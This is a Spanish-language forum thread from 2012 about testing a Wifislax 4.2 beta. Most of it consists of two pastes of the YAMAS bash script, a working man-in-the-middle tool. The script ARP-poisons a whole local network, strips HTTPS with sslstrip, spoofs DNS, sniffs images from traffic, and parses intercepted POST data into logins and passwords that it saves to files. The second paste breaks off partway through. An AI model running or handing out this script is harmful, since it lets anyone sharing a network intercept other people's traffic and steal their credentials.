Autor Tema: wifislax-4.2 32bits con kde 4.8.4 BETA 3  (Leído 30176 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #40 en: 27-07-2012, 20:20 (Viernes) »
Me gustaría que probarais este modulo, quien pueda y quiera: http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/numlockx-1.2-wifislax.xzm

Lo que hace es arrancar wifislax con el BloqNum activado,

se supone que solo debería activarse en ordenadores de escritorio, ya que en portátiles da problemas con el teclado, para ello, lleva un script (sacado de los repositorios de arch-linux) que detecta si se trata de un portátil o no.


MIRA , yo te lo puedo probar por que tenia un miniportatil al que le sentaba mal eso..a ver si ahora ya si , por que es un coñazo , lo del numlock.

asias..voy probarlo.


PROBADO

eeepc miniportatil ....el tecaldo queda bien ..nada anormal
asus portatil normal el teclado queda igual , numeros bloqueados (ovbio ya que es un portatil)
sobremesa..TODO OK

, metiendolo en beta 4   >:(


« Última modificación: 27-07-2012, 20:38 (Viernes) por USUARIONUEVO »

Desconectado geminis_demon

  • Colaborador
  • *
  • Mensajes: 2383
  • Prácticas precisas precisan práctica
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #41 en: 28-07-2012, 01:28 (Sábado) »
Me gustaría que probarais este modulo, quien pueda y quiera: http://downloadwireless.net/modulos-fase-testing/wifislax-4.2/numlockx-1.2-wifislax.xzm

Lo que hace es arrancar wifislax con el BloqNum activado,

se supone que solo debería activarse en ordenadores de escritorio, ya que en portátiles da problemas con el teclado, para ello, lleva un script (sacado de los repositorios de arch-linux) que detecta si se trata de un portátil o no.


MIRA , yo te lo puedo probar por que tenia un miniportatil al que le sentaba mal eso..a ver si ahora ya si , por que es un coñazo , lo del numlock.

asias..voy probarlo.


PROBADO

eeepc miniportatil ....el tecaldo queda bien ..nada anormal
asus portatil normal el teclado queda igual , numeros bloqueados (ovbio ya que es un portatil)
sobremesa..TODO OK

, metiendolo en beta 4   >:(

Perfect  ;)

La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #42 en: 28-07-2012, 02:30 (Sábado) »
YA TENGO CORREGIDO EL YAMAS.

ahora guardara todas las imagenes en

/root/driftnet

para la beta4 estara.

lo malo esque acabo de descubrir que por lo que sea los .gifs . no se pueden ver.

ahora toca mirar que pasa on los gifs....grrrr

Desconectado geminis_demon

  • Colaborador
  • *
  • Mensajes: 2383
  • Prácticas precisas precisan práctica
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #43 en: 28-07-2012, 03:24 (Sábado) »
YA TENGO CORREGIDO EL YAMAS.

ahora guardara todas las imagenes en

/root/driftnet

para la beta4 estara.

lo malo esque acabo de descubrir que por lo que sea los .gifs . no se pueden ver.

ahora toca mirar que pasa on los gifs....grrrr

Jeje yo también estaba con eso, como lo has hecho tu?

Yo le he puesto esta orden:
Código: [Seleccionar]
driftnet -i $iface -a -d $log_output_dir/capture_$(date +%d%m%y)  > /dev/null & driftnet -i $iface &> /dev/null &
Así no hace falta tcpxtract para nada, driftnet muestra las imagenes en pantalla y también las guarda en la carpeta con la fecha.

La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #44 en: 28-07-2012, 03:34 (Sábado) »
YA TENGO CORREGIDO EL YAMAS.

ahora guardara todas las imagenes en

/root/driftnet

para la beta4 estara.

lo malo esque acabo de descubrir que por lo que sea los .gifs . no se pueden ver.

ahora toca mirar que pasa on los gifs....grrrr

Jeje yo también estaba con eso, como lo has hecho tu?

Yo le he puesto esta orden:
Código: [Seleccionar]
driftnet -i $iface -a -d $log_output_dir/capture_$(date +%d%m%y)  > /dev/null & driftnet -i $iface &> /dev/null &
Así no hace falta tcpxtract para nada, driftnet muestra las imagenes en pantalla y también las guarda en la carpeta con la fecha.


YO HE SIDO MAS SALVAJE CREO.

quite lo de las fechas...aunque me gustaba la idea.


por que el fallo estaba en que no creaba la carpeta con fechas con lo que no podia mover las imagenes de tmp al directorio de captura.

ademas donde directorio de captura fiajte que pone ~    osea no especifica ruta.

hay una linea que decia

cp /tmp/drftnet* $directorio_de_catura_confecha

pero al no crear la ruta con su fecha ,pos como que no podia guardar nada.

------------
lo de las imagenes gif , eran las qt4 ....ya esta solventado tambien.


------
me gustaria poder dejar la opcion de que cree la carpeta con fechas en driftnet ..asi que estoy abierto a tu idea.

a mi no me crea la carpeta con fecha, de hay que no guardara nada.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #45 en: 28-07-2012, 03:38 (Sábado) »
acabo de caer en algo ...

yo modifique para que no guardara en tmp sino directamente en un directorio que generaba antes en root

si caes en la cuenta..al capturar en tmp y despues copiar en la ruta de captura, estas ocupando el doble de espacio ya que las imagenes se guardan en 2 sitios

tmp + directorio de captura.


la solucion intermedia es la de capturar directamente en

root/driftnet/capturas con fecha en la carpeta.

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #46 en: 28-07-2012, 03:40 (Sábado) »
te pego mi codigo ..a ver si llegamos a algo intermedio

[spoiler]# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX

if [ $UID -ne 0 ]; then
    echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
    sleep 3
    fi

log_output_dir=/root/driftnet
sslstrip_dir=
ask_for_install=n

if [ ! -d "$log_output_dir" ]; then
    mkdir -p $log_output_dir
fi

version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
   kill $looparseid
fi

if [[ $sslstripid != "" ]];then
   kill $sslstripid
fi

if [[ $dnsid != "" ]];then
   kill $dnsid
fi

if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi

if [[ "$etter" = "1" ]];then
   killall ettercap
else
   killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush          # there are probably too many resets here,
iptables --table nat --flush      # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
   rm /tmp/looparse.sh
fi

echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}

#Let's define some arguments that can be passed to the script :

#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
   -p | --parse)
      if [[ $2 == "" ]]; then
         echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
         exit 0
      fi
clear
   echo -e "Parsing $2 for credentials.\n\n"
   cat $2 |
   awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
   awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
   egrep -i -a -f /tmp/grepcred.txt |
   awk -F "=" '{if (length($2) < 4) print "";
   else if ($1 ~/Website/) print $0;
   else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
   else print "Login = \t"$2}' |
   uniq
   exit 0 ;;
   
   -e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
   etter="1"
   shift
   sleep 0.5 ;;

   -h | --help) clear
   echo -e "You are running $0, version $version.


usage : $0 -h -c -p -e -s -f
   -h or --help  :   Display this help message, disclaimer and exit.
   -c or --change: Display changelog and todo.   
   -e :   Use ettercap instead of ARPspoof. One might have one's reasons...
         ARPspoof is default.
   -p or --parse :   Only parse the given <file>. Don't use wildcards.
         Use > /output_file to print to a file.
   -s : The script won't download anything. Make sure you have the needed files.
   -f : Use a padlock favicon in sslstrip.
   
\033[31m DISCLAIMER :\033[m
This program is intended for learning purpose only. I do not condone hacking
and wouldn't be held responsible for your actions. Only you would face legal
consequences if you used this script for illegal activities.

\033[31m What I think should be learnt from this script :\033[m
This script should teach you how easy it is to steal sensitive online
credentials and how to protect you from it, provided you understand
what this program does. The best way to understand what it does is
to look at its source. This will also teach you basic shell scripting."
exit 0 ;;

   -c | --change)
   clear
   echo -e "\033[31m Changelog :\033[m
ToDo :
- FakeSSL -> Need help

\033[31mFeatures :\033[m
- Output of credentials as they are sniffed in xterm window.
- Log parsing for user-friendly output.
- Both arpspoof and ettercap are suported
- Network mapping for host discovery.
- Can save \"dumped\" passwords to file.
- Support for multiple targets on the network.
- Can parse a single file.
- Display ASCII tables for better readability of creds.
- All options know default, pressing only enter should get you through.
- Very neat and kewl ascii =D
- Miscellaneous features

\033[31m Credits :\033[m
Credits go to all people on backtrack forums for their help and support,
and google for being my best friend with scripting.
Special kudos to ShortBuss for something I should have seen a
long time ago (sslstrip before arpspoof) and many little improvements.
And of course, to the people responsible for the tools I am using in this script.

Please criticize this program or submit ideas on the official thread at
http://tinyurl.com/yamas-bt5 or send me a mail at contact.comax@gmail.com"
   exit ;;

   -s | --silent)
   echo "silent mode ON"
   silent="1"
   shift ;;

   -f | --fav)
   echo "favicon mode ON"
   fav="-f"
   shift ;;

   *) shift ;;
esac

done

### Message of the day ! <= Fucking useless, but who knows, I might want to warn about something directly, or tell a joke...
if [[ "$silent" = "1" ]]; then
   message="\nNo message to display : you are running in silent mode"
else
   message=$(curl --silent -q http://comax.fr/yamas/bt5/message) #store it to variable
fi

if [[ $1 = "-s" || $2 = "-s" ]]; then
   echo "ASCII tables won't be available."
   echo "ASCII tables are not available due to the use of silent mode." > /tmp/ascii
else
   wget -q http://comax.fr/yamas/bt5/ascii -O /tmp/ascii
fi

### Check for updates !
if [[ "$silent" = "1" ]];then
   echo "Not checking for a new version : silent mode."
else
   changelog=$(curl --silent -q http://comax.fr/yamas/bt5/changelog)
   last_version=$(curl --silent -q http://comax.fr/yamas/bt5/version) #store last version number to variable
   if [[ $last_version > $version ]];then # Comparing to current version
      echo -e "You are running version \033[31m$version\033[m, do you want to update to \033[32m$last_version\033[m? (Y/N)
Last changes are :
$changelog"
      read update
      if [[ $update = Y || $update = y ]];then
         echo "
  • Updating script..."

         wget -q http://comax.fr/yamas/bt5/yamas.sh -O $0
         chmod +x $0
         echo "[-] Script updated !"
         if [[ $0 != '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
            echo -e "Do you want to install it so that you can launch it with \"yamas\" ?"
            read install
            if [[ $install = Y || $install = y ]];then #do not proceed to install if using installed version : updating it already "installed" it over.
               cp $0 /usr/bin/yamas
               chmod +x /usr/bin/yamas
               echo "Script should now be installed, launching yamas !"
               sleep 3
               yamas
               exit 1
            else
               echo "Ok, continuing with updated version..."
               sleep 3
               $0
               exit 1
            fi
         fi
      
      sleep 2
      $0
      exit 1
      else
         echo "Ok, continuing with current version..."
      fi
   else
      echo "No update available"
   fi
fi
### End of update process

### Install process
if [[ ! -e '/usr/bin/yamas' && $ask_for_install = 'y' ]];then
   echo "Script is not installed. Do you want to install it ? (Y/N)"
   read install
   if [[ $install = Y || $install = y ]] ; then
      cp -v $0 /usr/bin/yamas
      chmod +x /usr/bin/yamas
      rm $0
      echo "Script should now be installed. Launching it !"
      sleep 3
      yamas
      exit 1
   else
      echo "Ok, not installing then !"
   fi
else
   echo "Script is installed"
   sleep 1
fi
### End of install process

clear
echo -e "
                                                               
     \`YMM'   \`MM'   db      \`7MMM.     ,MMF'      db       .M\"\"\"bgd
       VMA   ,V    ;MM:       MMMb    dPMM       ;MM:     ,MI    \"Y
        VMA ,V    ,V^MM.      M YM   ,M MM      ,V^MM.    \`MMb.     
         VMMP    ,M  \`MM      M  Mb  M' MM     ,M  \`MM      \`YMMNq.
          MM     AbmmmqMA     M  YM.P'  MM     AbmmmqMA   .     \`MM
          MM    A'     VML    M  \`YM'   MM    A'     VML  Mb     dM
        .JMML..AMA.   .AMMA..JML. \`'  .JMML..AMA.   .AMMA.P\"Ybmmd\" " # <= I love it.
echo -e "===========================================================================
=\033[31m       Welcome to Yet Another MITM Automation Script.\033[m                    =
=\033[31m       Use this tool responsibly, and enjoy!\033[m                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread : http://tinyurl.com/yamas-bt5                    =
=       Check out the help (-h) to see new features and informations      =
=       You are running version \033[32m$version\033[m                            =
==========================================================================="
echo -e "\033[36mMessage of the day :\033[m"
echo -e "$message"
echo

# Starting fresh : reset IP forward and iptables
echo -e "\033[31m
  • Cleaning iptables \033[m"

echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo "[-] Cleaned."

# Defining exit function and other ending features
cleanup()
{
echo
echo -e "\033[31m
  • Killing processes and resetting iptable.\033[m"

kill $sslstripid
kill $looparseid

if [[ $drifton = 1 ]]; #if driftnet was used
      then
     echo -e "\033[31mIMMA KILL THIS DRIFTNET BITCH\033[m" #It's between him and me.
         if [[ ! -e $log_output_dir ]]; #check if destination folder exists, since driftnet won't create one nor save images
        then
        mkdir $log_output_dir #create if needed
         fi
     killall driftnet #kill the unbeliever
     elif [[ $drifton = 2 ]]; #if tcpxtract was used
     then
     killall tcpxtract  #kill it...
fi

if [[ "$etter" = "1" ]];then
   killall ettercap
else
   killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush          # there are probably too many resets here,
iptables --table nat --flush      # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
rm /tmp/looparse.sh
echo -e "\033[32m[-] Clean up successful !\033[m"
echo -e "\nDo you want to keep the whole log file for further use or shall we delete it? (Y=keep)"
echo "(If you want to keep it, it will be stored in $log_output_dir/$filename.txt)"
read -e keep
if [[ $keep = "Y" || $keep = "y" ]];then # double brackets because double condition. || signifies "or"
   cp /tmp/$filename.txt $log_output_dir/$filename.txt #moving file
   if [ -f "$log_output_dir/$filename.txt" ]; then #check if it exists
      echo "Log file copied !" #it does
      else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
   fi
else
   echo "Logs not saved"
fi

echo -e "\nDo you want to save passwords to a file? (Y=keep)"
echo "(If you want to keep it, it will be saved in $log_output_dir/$filename.pass.txt)"
read -e keeppd
if [[ $keeppd = "Y" || $keeppd = "y" ]];then # double brackets because double condition. || signifies "or"
   cat /tmp/$filename.txt |
   awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
   awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
   egrep -i -a -f /tmp/grepcred.txt |
   awk -F "=" '{if (length($2) < 4) print "";
   else if ($1 ~/Website/) print $0;
   else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
   else print "Login = \t"$2}' |
   uniq >> $log_output_dir/$filename.pass.txt # >> appends to a potential previous file.
   if [ -f "$log_output_dir/$filename.pass.txt" ]; then #check if it exists
      echo "Passwords saved !" #it does
   else
      echo "Error while saving passwords" #it does not
   fi
else
   echo "Password saving skipped."
fi

rm /tmp/$filename.txt
echo -e "\nTemporary files deleted."
if [[ -f "/usr/bin/yamas" && $ask_for_install != 'y' ]];then #check if script is already installed
   echo -e "\n\n"
   exit 1 #if yes, exit.
else
   echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'yamas' in console? (Y/N)"
   read -e install
      case $install in
      Y | y | yes)
         cp $0 /usr/bin/yamas #copy and rename script
         echo -e "\033[32m Script installed !\033[m" ;;
      *) echo "Script not installed." ;;
      esac
fi

exit 1
}

search=$(ip route show | awk '(NR == 2) { print $1}') #store gateway/24 for whole network mapping to variable
#We put it here in the middle, because it could be used two times, but the gateway shouldn't change,
#so there is no need to do it twice.

rescan ()
{
echo -e "\033[31m"
nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discorvey
echo -en "\033[m"
final
}

add_target()
{
echo "Enter a new IP adress to attack :"
read newip
xterm -geometry 90x3-1-1 -T "Poisoning $newip" -e arpspoof -i $iface -t $newip $gateway 2>/dev/null & sleep 2
final
}

ascii()
{
clear
cat /tmp/ascii
rm /tmp/ascii
final
}

dns_spoof()
{

### Make Host function###
   mkhst()
   {
   echo "Enter your redirection list line by line. End with #.
Usage is : 127.0.0.1 foo.bar.com
Wildcards may be used."
   rm ~/hosts_spoof
   while :
   do
      read input
      echo "$input" >> ~/hosts_spoof
      if [[ $input == "#" ]];then
         break
      fi
   done
   }

###EOfunc###
echo "If you already have a host file, enter its path. If you don't, press enter."
read gothost
if [[ $gothost != "" ]];then
   echo "Host file $gothost will be used."
else
   echo -e "We'll make one...\n"
   mkhst
fi

xterm -geometry 90x3-1-1 -T "DNS spoofing" -e dnsspoof -i $iface -f ~/hosts_spoof & dnsid=$!
}

choose_dns()
{
echo "Would you like to use Ettercap 'dns_spoof' plugin or dnsspoof (E/D) ? Press a to abort"
read spoofpgm
case $spoofpgm in
   E) echo "We'll use ettercap. Make sure to have edited /usr/share/ettercap/etter.dns"
   ettercap -D -q -i $iface -T -P dns_spoof & etterspoofid=$! ;;
   
   D) echo "We'll use dnsspoof."
   dns_spoof ;;

   a | A) final ;;

   *) echo "Wrong choice. Please use E or D"
   choose_dns;;
esac

final
}

misc()
{
echo -e "\nHere are the miscellanous features.
1. Image sniffing
2. DNS spoofing
3. Previous menu."
read misc
case $misc in
   1) image_menu
      final ;;
   2) choose_dns ;;
   3) final ;;
   *) echo "bad choice"
     misc ;;
esac
}

image_menu()
{
echo -e "Would you rather use driftnet (display images) or tcpxtract ?
1. Tcpxtract (saves all images to $log_output_dir/capture[date])
2. Driftnet (Display images on screen and save all images to $log_output_dir/capture[date])"
read image_choice
case $image_choice in
   1) tcpxtract -d $iface -o $log_output_dir/capture_$(date +%d%m%y) > /dev/null & tcpid=$!
      drifton=2
      echo "tcpxtract is launched with pid $tcpid"
      misc ;;
   2)       driftnet -i $iface -d $log_output_dir &> /dev/null &
      drifton=1
      echo "Driftnet launched."
      misc ;;
esac
}

rtparse()
{
echo -e "\n\nIn this menu, you can pause, resume, kill, or launch
realtime parsing (RTP).
1. Pause RTP (keep xterm open for you to read, copypasta, etc.)
2. Resume RTP.
3. Kill RTP (stop and close xterm)
4. Re-launch RTP
5. Previous menu."
read rtp
case $rtp in # not sure if this should be quote enclosed...anyone want to help out?  It's singular options without a space, so I think the need for quotes is NOT needed??
   1) echo -e "\033[33m
  • Pausing...\033[m"

   kill -19 $looparseid
   echo -e "\033[33m[-]Paused.\033[m"
   rtparse;;

   2) echo -e "\033[33m
  • Resuming...\033[m"

   kill -18 $looparseid
   echo -e "\033[33m[-]Resumed.\033[m"
   rtparse;;

   3) echo -e "\033[31m
  • Killing...\033[m"

   kill $looparseid
   echo -e "\033[33m[-]Killed.\033[m"
   rtparse;;

   4) echo -e "\033[32m
  • Launching...\033[m"

   xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$!
   sleep 2
   echo -e "\033[33m[-]Launched.\033[m"
   rtparse;;

   5) echo "Previous"
   final ;;

   *) echo -e "\033[31mBad choice bro !\033[m\n" #Professional Language =)
   rtparse;;
esac
}

final()
{
echo -e "\n\033[32mAttack is running\033[m. You can :
1. Rescan network.
2. Add a target (useless if targeting whole network).
3. Display ASCII correspondence table.
4. Real-time parsing...
5. Misc features.
6. Quit properly.

Enter the number of the desired option."
read final
case $final in
   1) rescan ;;

   2) add_target ;;

   3) ascii ;;

   4) rtparse ;;

   5) misc ;;

   6) cleanup ;;

   *) echo -e "\033[31mBad choice bro !\033[m\n" #was "motherfucker" during my tests.
   final ;;
esac
}

###############################End of functions#############################

# IP forwarding
echo
echo -e "\033[31m
  • Activating IP forwarding... \033[m"

echo "1" > /proc/sys/net/ipv4/ip_forward
echo "[-] Activated."

#Iptables
echo
echo -e "\033[31m
  • Configuring iptables... \033[m"

echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
echo
read -e outport
if [ "$outport" = "" ];then
   outport=8080
   echo -e "Port $outport selected as default.\n"
fi

echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
echo
read -e inport
if [ "$inport" = "" ];then
   inport=80
   echo -e "Port $inport selected as default.\n"
fi

echo -e "\n\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
echo "[-] Traffic rerouted"

#Sslstrip
echo
echo -e "\033[31m
  • Activating sslstrip... \033[m"

echo  "Choose filename to output : (default = yamas)"
read -e filename
if [ "$filename" = "" ];then
   filename="yamas"
fi

echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in /tmp/$filename.txt\033[m"

if [ ! -e '/usr/bin/sslstrip' ];then # If sslstrip isn't installed
   if [ ! -x '$sslstrip_dir/sslstrip.py' ];then #if non-installed is not executable
      chmod +x $sslstrip_dir/sslstrip.py #make it executable
   fi
   $sslstrip_dir/sslstrip.py $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$! #launch non-installed
else
   sslstrip $fav -a -k -l $outport -w /tmp/$filename.txt 2> /dev/null & sslstripid=$!
fi

sleep 4 #let time for sslstrip to launch. Might be bit too much, but better prevent than heal.
echo
echo -e " [-] Sslstrip is running." # a bit redundant, but who cares?
echo

#Arpspoofing
echo
echo -e "\033[31m
  • Activating ARP cache poisoning... \033[m"

echo
ip route show | awk '(NR == 1) { print "Gateway :", $3,"    ", "Interface :", $5}' #Output IP route show user-friendly
iface=$(ip route show | awk '(NR == 1) { print $5}')
gateway=$(ip route show | awk '(NR == 1) { print $3}') #store gateway ip
echo
echo "Enter IP gateway adress or press enter to use $gateway."
read -e gateway
if [ "$gateway" = "" ];then
   gateway=$(ip route show | awk '(NR == 1) { print $3}') #restore gateway ip since pressing enter set our var to null
   echo -e "$gateway selected as default.\n"
fi

echo
echo "What interface would you like to use? It should match IP gateway as shown above. Press enter to use $iface."
read -e iface
if [ "$iface" = "" ];then
   iface=$(ip route show | awk '(NR == 1) { print $5}') #store default interface
   echo -e "$iface selected as default.\n"
fi

echo -e "\r"
echo -e "We will target the whole network as default. You can \033[4md\033[miscover hosts and enter IP(s) manually by entering \033[4mD\033[m.
Press enter to default."
read -e choicearp
echo
if [[ $choicearp = "D" || $choicearp = "d" ]];then
   echo -e "\nDo you want to map the network to show live hosts? (Y/N)   [This might take up to 30 secs, be patient]"
   read -e hosts
   echo -e "\033[31m "
   if [[ $hosts = "Y" || $hosts = "y" ]];then
      nmap -sn $search | grep report | awk -F for '{ print $2 }' #host discovery
      echo -e "\033[m " # switch color back to white
   else
      echo -e "\033[m "
   fi
   echo -e "Please enter targets according to usage : IP1 IP2 IP3...
\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network targeting.\033[m "
   arpspoofi()
   { # We launch ARPspoof in different xterm windows to keep script running
   while [ "$1" != "" ];do
      xterm -geometry 90x3-1-1 -T "Poisoning $1" -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
      shift
   done

   echo -e "\033[33m Targeting $parameters on $gateway on $iface with ARPspoof\033[m"
   }

   ettercapi()
   { # We launch ARPspoof in different xterm windows to keep script running
   while [ "$1" != "" ];do
      xterm -geometry 90x3-1-1 -T "Poisoning $1" -e ettercap -o -q -i $iface -T -M arp  /$gateway/ /$1/ 2>/dev/null & sleep 2
      shift
   done

   echo -e "\033[33m Targeting $parameters on $gateway on $iface with Ettercap\033[m"
   }

   read -e parameters
   if [[ "$etter" = "1" ]];then
      ettercapi $parameters
   else
      arpspoofi $parameters
   fi

else
   if [[ "$etter" = "1" ]];then
      xterm -geometry 90x3-1-1 -T ettercap -e ettercap -o -q -i $iface -T -M arp  // // &
      sleep 2
      echo -e "\033[33m Targeting the whole network on $gateway on $iface with Ettercap\033[m"
   else
      xterm -geometry 90x3-1-1 -T arpspoof -e arpspoof -i $iface $gateway &
      sleep 2
      echo -e "\033[33m Targeting the whole network on $gateway on $iface with ARPspoof\033[m"
   fi
fi

echo -e "[-] Arp cache poisoning is launched. \033[31m Keep new window(s) running. \033[m"
echo -e "\n\033[32m Attack should be running smooth, enjoy.\033[m"
echo
echo
echo "looparse(){
while :
do
   clear
   echo -e 'Note that %40 %21, etc. are ASCII chars. + means a space...\n'
   cat /tmp/$filename.txt |
awk -F \"(\" '/POST Data/ {for (i=1;i<=NF;i++) if (match(\$i,/POST Data/)) n=i; print \"Website = \t\"\$2; getline; print \$n\"\n\"}' |
awk -F \"&\" '{for(i=1;i<=NF;i++) print \$i }' | #print each field on a new line
egrep -i -f '/tmp/grepcred.txt' |
awk -F \"=\" '{if (length(\$2) < 3) print \"\";
else if (\$1 ~/[W]/) print \$0;
else if (\$1 ~/[Pp]/) print \"Password = \t\" \$2\"\n\";
else print \"Login = \t\t\", \$2}' |
uniq
sleep 7
done
  }
looparse" > /tmp/looparse.sh #We create a parsing script on-the-fly, chmod it, run it, kill it and remove it at the end.
chmod +x /tmp/looparse.sh
xterm -hold -geometry 90x20-1-100 -T Passwords -e /tmp/looparse.sh & looparseid=$! #here's the beauty
sleep 2
final #call the "final" function. Yes, it's the final one.
### End of the script fellas.[/spoiler]

Desconectado USUARIONUEVO

  • Moderador
  • *
  • Mensajes: 14480
Re: wifislax-4.2 32bits con kde 4.8.4 BETA 3
« Respuesta #47 en: 28-07-2012, 05:04 (Sábado) »
bueno , pues ya lo tengo.

las capturas van a /root/driftnet/capeta_fecha-captura     >:(

he eliminado del menu la opcion de selccion entre driftnet o el otro snifer ,....y he autoseleccionado driftnet
con lo que al darle a opcion 5 ...aparece el menu de añadidos, en el que aparece

image snifing

es seleccionar esa opcion , et voila..nada mas que hacer..es decir ..antes elegias esa opcion y te preguntaba que esnifer lanzar..ahora ya lo hace todo automatico.   >:( >:( >:(

he usado la orden que puso geminis_demon  y despues ajuste la ruta de captura y modifique la opcion de image capturing.


code

[spoiler]# #!/bin/bash
# Bash script to launch man it the middle attack and sslstrip.
# version 0.9 by comaX

if [ $UID -ne 0 ]; then
    echo -e "\033[31This program must be run as root.
This will probably fail.\033[m"
    sleep 3
    fi

log_output_dir=/root/driftnet
sslstrip_dir=
ask_for_install=n

if [ ! -d "$log_output_dir" ]; then
    mkdir -p $log_output_dir
fi

version="20120213"
# if user ^C then execute cleanup function
trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
fast_cleanup()
{
echo -e "\n\n\033[31m ^C catched. Cleaning up, then exit.\033[m"
if [[ $looparseid != "" ]];then
   kill $looparseid
fi

if [[ $sslstripid != "" ]];then
   kill $sslstripid
fi

if [[ $dnsid != "" ]];then
   kill $dnsid
fi

if [[ $etterspoofid != "" ]];then
kill $etterspoofid
fi

if [[ "$etter" = "1" ]];then
   killall ettercap
else
   killall arpspoof
fi

echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
iptables --flush          # there are probably too many resets here,
iptables --table nat --flush      # but at least we're sure everything's clean
iptables --delete-chain
iptables --table nat --delete-chain
if [ -e '/tmp/looparse.sh' ]; then
   rm /tmp/looparse.sh
fi

echo -e "\033[32m[-] Clean up successful !\033[m"
exit 0
}

#Let's define some arguments that can be passed to the script :

#generating grepcred.txt so that it doesn't have to be downloaded each time
#it was originally being downloaded so I could easily fix it, but there has
#been no fix to be done... So why use a file instead of a command line ?
#It's just much more easier this way.
echo -e "credential\nemail\nlast\nlog\nmodified\nname\nnickname\npass\npersistent\npw\nsession\ntextbox\nuser\nwebsite" > /tmp/grepcred.txt
while [ "$1" != "" ];do
case $1 in
   -p | --parse)
      if [[ $2 == "" ]]; then
         echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
         exit 0
      fi
clear
   echo -e "Parsing $2 for credentials.\n\n"
   cat $2 |
   awk -F "(" '/POST Data/ {for (i=1;i<=NF;i++) if (match($i,/POST Data/)) n=i; print "Website = \t"$2; getline; print $n"\n"}' |
   awk -F "&" '{for(i=1;i<=NF;i++) print $i }' |
   egrep -i -a -f /tmp/grepcred.txt |
   awk -F "=" '{if (length($2) < 4) print "";
   else if ($1 ~/Website/) print $0;
   else if ($1 ~/[Pp]/) print "Password = \t"$2"\n";
   else print "Login = \t"$2}' |
   uniq
   exit 0 ;;
   
   -e | --etter) echo -e "\tYou will be using Ettercap instead of ARPspoof."
   etter="1"
   shift
   sleep 0.5 ;;

   -h | --help) clear
   echo -e "You are running $0, version $version.


usage : $0 -h -c -p -e -s -f
   -h or --help  :   Display this help message, disclaimer and exit.
   -c or --change: Display changelog and todo.   
   -e :   Use ettercap instead of ARPspoof. One might have one's reasons...
         ARPspoof is default.
   -p or --parse :   Only parse the given <file>. Don't use wildcards.
         Use > /output_file to print to a file.
   -s : The script won't download anything. Make sure you have the needed files.
   -f : Use a padlock favicon in sslstrip.
   
\033[31m DISCLAIMER :\033[m
